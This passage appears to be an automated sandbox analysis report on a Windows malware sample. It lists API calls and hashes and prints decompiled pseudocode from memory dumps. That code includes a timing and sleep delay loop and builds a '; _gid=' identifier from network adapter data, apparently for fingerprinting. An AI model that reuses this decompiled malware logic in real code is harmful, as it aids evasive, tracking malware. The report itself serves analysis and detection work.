                                                                                                                                                                                                    • Associated: 00000004.00000002.2111291794.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111308631.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111312450.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LookupAccountNameW.ADVAPI32 ref: 0209233C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccountLookupName
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1484870144-0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                    			E02092434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
                                                                                                                                                                                                    				void* __rbp;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				signed long long _t51;
                                                                                                                                                                                                    				signed long long _t52;
                                                                                                                                                                                                    				signed long long _t64;
                                                                                                                                                                                                    				long long _t69;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t82 = __r9;
                                                                                                                                                                                                    				_t71 = __rsi;
                                                                                                                                                                                                    				_t69 = __rdi;
                                                                                                                                                                                                    				_t64 = __rdx;
                                                                                                                                                                                                    				_t52 = __rbx;
                                                                                                                                                                                                    				_t51 = __rax;
                                                                                                                                                                                                    				 *((long long*)(_t75 + 0x18)) = __rbx;
                                                                                                                                                                                                    				 *((long long*)(_t75 + 0x20)) = __rdi;
                                                                                                                                                                                                    				_t73 = _t75 - 0x57;
                                                                                                                                                                                                    				_t4 = _t52 + 4; // 0x4
                                                                                                                                                                                                    				_t40 = _t4;
                                                                                                                                                                                                    				goto L1;
                                                                                                                                                                                                    				L9:
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    				L1:
                                                                                                                                                                                                    				asm("rdtsc");
                                                                                                                                                                                                    				_t64 = _t64 << 0x20;
                                                                                                                                                                                                    				_t51 = _t51 | _t64;
                                                                                                                                                                                                    				_t52 = _t52 << 0x00000010 | __rcx;
                                                                                                                                                                                                    				SleepEx(??, ??); // executed
                                                                                                                                                                                                    				_t69 = _t69 - 1;
                                                                                                                                                                                                    				if(_t69 != 0) {
                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					wsprintfA();
                                                                                                                                                                                                    					E020911FC(_t73 - 0x29, _t52);
                                                                                                                                                                                                    					_t37 = E0209153C(_t73 - 0x29);
                                                                                                                                                                                                    					E02092C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
                                                                                                                                                                                                    					_t44 = _t51;
                                                                                                                                                                                                    					if(_t51 != 0) {
                                                                                                                                                                                                    						_t80 = _t73 + 0x67;
                                                                                                                                                                                                    						if(E02091EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
                                                                                                                                                                                                    							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
                                                                                                                                                                                                    							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
                                                                                                                                                                                                    								_t27 = E0209272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
                                                                                                                                                                                                    								_t55 =  *((intOrPtr*)(_t73 + 0x67));
                                                                                                                                                                                                    								_t41 = _t27;
                                                                                                                                                                                                    								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
                                                                                                                                                                                                    									GetProcessHeap();
                                                                                                                                                                                                    									HeapFree(??, ??, ??);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E02091FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
                                                                                                                                                                                                    								_t49 = _t51;
                                                                                                                                                                                                    								if(_t51 != 0) {
                                                                                                                                                                                                    									E02092A1C(_t49, _t73 + 0x1b, _t51);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                    • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction ID: 894e5e71e3bb9ac5bb1b09fbe515ead3588feacd2e3d4552e3993ecc9e25283a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9621CF72300B40AAEF10DFB1E8543DD63A2E788788F484426DE4F57619EF38D55AE750
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,02091E13), ref: 0209264B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoNativeSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1721193555-0
                                                                                                                                                                                                    • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction ID: 02a22a7ded9f1056dc3f661b76a9eb0592dbc8ced805d15c411b9e72c1836ed2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29E09263720741D2DF25EB20E8583993361FBC4704F840222894F02675EF3CD6AEDB00
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                    • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction ID: 199eb888da48ed38edbcf61d2d36ccd2b26fc5495fc514a1f207ec96fc35b079
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD0A972F1038183EB318B20EA1B39A6361F3D4319F808206C94F44A65CF7EC199CA00
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                                                    			E002027BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                    				void* __rdi;
                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				long long _t46;
                                                                                                                                                                                                    				intOrPtr* _t48;
                                                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                                                    				intOrPtr* _t62;
                                                                                                                                                                                                    				signed long long _t64;
                                                                                                                                                                                                    				long long* _t67;
                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                    				struct HINSTANCE__* _t79;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                    				char* _t83;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t64 = __rsi;
                                                                                                                                                                                                    				_t46 = __rbx;
                                                                                                                                                                                                    				_t44 = _t69;
                                                                                                                                                                                                    				 *((long long*)(_t44 + 8)) = __rbx;
                                                                                                                                                                                                    				 *((long long*)(_t44 + 0x18)) = __rbp;
                                                                                                                                                                                                    				 *((long long*)(_t44 + 0x20)) = __rsi;
                                                                                                                                                                                                    				_push(_t62);
                                                                                                                                                                                                    				_t80 = __rcx;
                                                                                                                                                                                                    				_t83 = L"; _gid=";
                                                                                                                                                                                                    				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
                                                                                                                                                                                                    				LoadLibraryA(_t82);
                                                                                                                                                                                                    				GetProcAddress(_t79);
                                                                                                                                                                                                    				_t67 = _t44;
                                                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					r9d = 1;
                                                                                                                                                                                                    					_t23 = E00202990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x2070c4, _t77, _t78);
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					return _t23;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t24 =  *_t67(); // executed
                                                                                                                                                                                                    				if(_t24 == 0x6f && __rbx != 0) {
                                                                                                                                                                                                    					GetProcessHeap();
                                                                                                                                                                                                    					_t9 = _t64 + 8; // 0x8
                                                                                                                                                                                                    					_t36 = _t9;
                                                                                                                                                                                                    					HeapAlloc(??, ??, ??);
                                                                                                                                                                                                    					_t62 = _t44;
                                                                                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t54 = _t44; // executed
                                                                                                                                                                                                    					_t27 =  *_t67(); // executed
                                                                                                                                                                                                    					if(_t27 == 0) {
                                                                                                                                                                                                    						_t48 = _t62;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
                                                                                                                                                                                                    								_t35 =  *((intOrPtr*)(_t48 + 0x194));
                                                                                                                                                                                                    								if(_t54 - 1 <= 7) {
                                                                                                                                                                                                    									r9d = _t35;
                                                                                                                                                                                                    									_t18 = _t48 + 0x198; // 0x198
                                                                                                                                                                                                    									_t54 = _t80 + _t64 * 2;
                                                                                                                                                                                                    									E00202990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
                                                                                                                                                                                                    									_t64 = _t64 + _t44;
                                                                                                                                                                                                    									_t83 = ":";
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t48 =  *_t48;
                                                                                                                                                                                                    						} while (_t48 != 0);
                                                                                                                                                                                                    						GetProcessHeap();
                                                                                                                                                                                                    						_t36 = 0;
                                                                                                                                                                                                    						_t23 = HeapFree(??, ??, ??);
                                                                                                                                                                                                    						if(_t64 == 0) {
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					GetProcessHeap();
                                                                                                                                                                                                    					_t36 = 0;
                                                                                                                                                                                                    					HeapFree(??, ??, ??);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00202CFE,?,?,00000003,002024A4), ref: 0020280F
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00202CFE,?,?,00000003,002024A4), ref: 00202845
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersInfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177971545-0
                                                                                                                                                                                                    • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction ID: 3c420371a1be33b9440f84438594a021f2b4e0197fa534e6068a36d5abcd18ee
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8319C65611B81D2EB19EF62E8087997762EB49F94F48C026CF0D17796EF38C54DC310
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(?,?,00000000,00202CB1,?,?,00000003,002024A4), ref: 002016CB
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,00202CB1,?,?,00000003,002024A4), ref: 00201709
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3114120137-0
                                                                                                                                                                                                    • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction ID: c328992289bf991f6212d472623673a89c8f61bc8fd52abc1e412564811b72c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF219565725B4183EF19EF52A848355A2A2FF85BC1F188034DF0A577A6EF3CC9658700
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction ID: 9efea63201c58450c94c988a18ba81fab029b61ac03d217f26770085c014dca7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9171F072321B8287EB24CF62E854BA977A1FB88B94F448125DF4A53F95DF38C5A5C700
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcessSleepUser
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 354099737-0
                                                                                                                                                                                                    • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                    • Instruction ID: 10d80fdca22810e5da5c10328df80ee21a9756f5c7852084ec4bac4bf90f0e13
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9C08C30520780C2F31D7B60E88C3282237A700305F00861DC34305AE28F3C04F8C703
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LookupAccountNameW.ADVAPI32 ref: 0020233C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccountLookupName
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1484870144-0
                                                                                                                                                                                                    • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                    • Instruction ID: 4b0ea20dc380f593552e4f97726c677bb179d0827474fd1791e922d15cb8090e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20318DB2711B41CAEB149FB4E84839933A5EB48B88F588136DB4D67B5AEF38C55CC340
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                    			E00202434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
                                                                                                                                                                                                    				void* __rbp;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				signed long long _t51;
                                                                                                                                                                                                    				signed long long _t52;
                                                                                                                                                                                                    				signed long long _t64;
                                                                                                                                                                                                    				long long _t69;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t82 = __r9;
                                                                                                                                                                                                    				_t71 = __rsi;
                                                                                                                                                                                                    				_t69 = __rdi;
                                                                                                                                                                                                    				_t64 = __rdx;
                                                                                                                                                                                                    				_t52 = __rbx;
                                                                                                                                                                                                    				_t51 = __rax;
                                                                                                                                                                                                    				 *((long long*)(_t75 + 0x18)) = __rbx;
                                                                                                                                                                                                    				 *((long long*)(_t75 + 0x20)) = __rdi;
                                                                                                                                                                                                    				_t73 = _t75 - 0x57;
                                                                                                                                                                                                    				_t4 = _t52 + 4; // 0x4
                                                                                                                                                                                                    				_t40 = _t4;
                                                                                                                                                                                                    				goto L1;
                                                                                                                                                                                                    				L9:
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    				L1:
                                                                                                                                                                                                    				asm("rdtsc");
                                                                                                                                                                                                    				_t64 = _t64 << 0x20;
                                                                                                                                                                                                    				_t51 = _t51 | _t64;
                                                                                                                                                                                                    				_t52 = _t52 << 0x00000010 | __rcx;
                                                                                                                                                                                                    				SleepEx(??, ??); // executed
                                                                                                                                                                                                    				_t69 = _t69 - 1;
                                                                                                                                                                                                    				if(_t69 != 0) {
                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					wsprintfA();
                                                                                                                                                                                                    					E002011FC(_t73 - 0x29, _t52);
                                                                                                                                                                                                    					_t37 = E0020153C(_t73 - 0x29);
                                                                                                                                                                                                    					E00202C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
                                                                                                                                                                                                    					_t44 = _t51;
                                                                                                                                                                                                    					if(_t51 != 0) {
                                                                                                                                                                                                    						_t80 = _t73 + 0x67;
                                                                                                                                                                                                    						if(E00201EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
                                                                                                                                                                                                    							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
                                                                                                                                                                                                    							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
                                                                                                                                                                                                    								_t27 = E0020272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
                                                                                                                                                                                                    								_t55 =  *((intOrPtr*)(_t73 + 0x67));
                                                                                                                                                                                                    								_t41 = _t27;
                                                                                                                                                                                                    								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
                                                                                                                                                                                                    									GetProcessHeap();
                                                                                                                                                                                                    									HeapFree(??, ??, ??);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E00201FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
                                                                                                                                                                                                    								_t49 = _t51;
                                                                                                                                                                                                    								if(_t51 != 0) {
                                                                                                                                                                                                    									E00202A1C(_t49, _t73 + 0x1b, _t51);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}














                                                                                                                                                                                                    0x0020250d
                                                                                                                                                                                                    0x0020250d
                                                                                                                                                                                                    0x00202504
                                                                                                                                                                                                    0x002024cc
                                                                                                                                                                                                    0x002024bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x002024a7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                    • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction ID: 6acef987b91d238e731fd9a5f681704869e5b00656527f97a441a3d0e419367b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0921CF72310B41CAEF14EFB1E8583DD23A2E788784F884426EF0D5769AEE38D529C750
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00201E13), ref: 0020264B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoNativeSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1721193555-0
                                                                                                                                                                                                    • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction ID: d41baaa2d3036e28e01795de75e0ab1c9d7bec7a3d8c9b824f68205077471eef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56E01262B25745D2DF15FB20E8583993362FB94704F844226965E426A5EF3CD65DC700
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000006.00000002.2114408052.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                    • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction ID: dddc93472b349a903efe13cc16ee5ee983fe16b1b213149b7c6cde98ffc81f68
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1D0A7B2E1034083E7349B10EA5A3992722F3D4315FC0C206CA8944955CF3CC168C600
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Non-executed Functions